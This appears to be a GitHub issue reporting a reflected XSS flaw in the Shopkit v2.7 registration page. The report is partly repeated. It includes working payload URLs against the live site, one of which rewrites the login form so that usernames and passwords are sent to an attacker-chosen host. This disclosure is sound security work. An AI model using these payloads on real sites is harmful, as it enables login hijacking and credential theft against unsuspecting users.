Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
In the latest version v2.7
First,I found a reflective XSS vulnerability in register.
The payload is:
"><img/src=x+onerror=alert("XSS_vulnerability")><xss=" https://shopkit.samnabi.com/account/register?email="><img/src=x+onerror=alert("XSS_vulnerability")><xss="
Then,I fount this XSS vulnerability could cause login hijacking
"><svg/onload%3d"var+form1+%3d+document.getElementById('loginform')%3bform1.action+%3d+'http%3a//127.0.0.1/test.php'%3b"><xss%3d" https://shopkit.samnabi.com/account/register?email="><svg/onload%3d"var+form1+%3d+document.getElementById('loginform')%3bform1.action+%3d+'http%3a//127.0.0.1/test.php'%3b"><xss%3d"
When the user enters a username via this link,as shown below
Then click on the "log in"
The username and password will be submitted to my link.
The text was updated successfully, but these errors were encountered:
5eb0af2
No branches or pull requests
In the latest version v2.7
First,I found a reflective XSS vulnerability in register.
The payload is:
Then,I fount this XSS vulnerability could cause login hijacking
The payload is:
When the user enters a username via this link,as shown below
Then click on the "log in"
The username and password will be submitted to my link.
The text was updated successfully, but these errors were encountered: